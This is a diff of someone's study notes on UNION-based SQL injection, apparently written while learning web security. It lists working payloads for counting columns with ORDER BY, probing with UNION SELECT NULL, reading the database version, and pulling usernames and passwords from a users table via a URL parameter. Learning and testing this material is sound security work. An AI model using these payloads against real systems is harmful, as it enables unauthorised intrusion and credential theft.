fathimakm/web_security_notes/sql_injection.md

     - the number and order of columns must be the same in all queries, data type must be the same
     - to determine the column (use ORDER BY, use NULL VALUES)
+#### union
 - to check the number of columns
     `' ORDER by 3 --  (some doesn't accept -- so we can use #)`
     `' ORDER by 3 # (to url encode, CTRL+U)`
     - 'ORDER+by+2%23 if 200 okay, 2 columns present
-    - 'ORDER+by+3%23 if 500 internal server error, 3rd column not present (3-1=2 colums only)
+    - 'ORDER+by+3%23 if 500 internal server error, 3rd column not present (3-1=2 columns only)

     - another method
-        UNION SELECT NULL , if error incorrect no. of column UNION SELECT NULL, NULL ,if 200 okay , 2 columns
+       `' UNION SELECT NULL --`, if error incorrect no. of column `' UNION SELECT NULL, NULL--` ,if 200 okay , 2 columns

 - to check if data type is same, `' UNION SELECT 'a', 'a'#` this checks if data type of 1st column is text , and 2nd column is also text.
+    `'UNION SELECT NULL,'a',NULL --` (to check if particular column has string, if 200 success, otherwise not string)

 - to find version of database,
-' UNION SELECT @@version, NULL# (null is added because there are 2 columns)
+`' UNION SELECT @@version, NULL# `  (null is added because there are 2 column)

-    `www.test.com/app.php?id=' UNION SELECT username, password FROM users--` we didn't give id so it's empty
+`www.test.com/app.php?id=' UNION SELECT username, password FROM users--`
+    we didn't give id so it's empty
     `output:ac1, passw1, adm1, pass2`